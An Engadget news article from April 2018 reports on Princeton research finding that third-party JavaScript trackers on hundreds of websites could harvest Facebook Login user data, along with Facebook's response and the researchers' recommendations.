Your Facebook data can be snatched by JavaScript trackers

Abusive scripts are snatching data when users log in to websites with Facebook credentials.

Sponsored Links

David Lumb
April 19, 2018 3:47 PM

Facebook is looking into a security report that reveals Facebook user data can be snatched by JavaScript trackers if they're planted in websites that let users log in with their Facebook credentials. Not just their name and email address, either: The exploit catches age range, gender, locale and possibly a profile photo too, depending on how much access the user allowed said website. Once someone logs in, any third-party JavaScript can supposedly retrieve their info at will.

The report, by Princeton's Center for Information Technology Policy website Freedom to Tinker, listed 431 of the top one million sites (by Alexa rank) that have the shady scripts embedded. The list included cloud database provider MongoDB until TechCrunch brought the issue to their attention, after which they allegedly shut down the abusive script.

"Scraping Facebook user data is in direct violation of our policies," a Facebook spokesperson told Engadget. "While we are investigating this issue, we have taken immediate action by suspending the ability to link unique user IDs for specific applications to individual Facebook profile pages, and are working to institute additional authentication and rate limiting for Facebook Login profile picture requests."

Turn on browser notifications to receive breaking news alerts from Engadget
You can disable notifications at any time in your settings menu.
Not now

The report concluded that exposed user data wasn't due to a bug in Facebook's login feature -- instead, it's "due to the lack of security boundaries between the first-party and third-party scripts in today's web." To fix this loophole, the report's authors recommend Facebook (and any other services that have social logins) audit their APIs to review who accesses login data. Cheekily, they also recommend finally making Anonymous Login with Facebook available after it had been announced four years ago.

All products recommended by Engadget are selected by our editorial team, independent of our parent company. Some of our stories include affiliate links. If you buy something through one of these links, we may earn an affiliate commission.
Popular on Engadget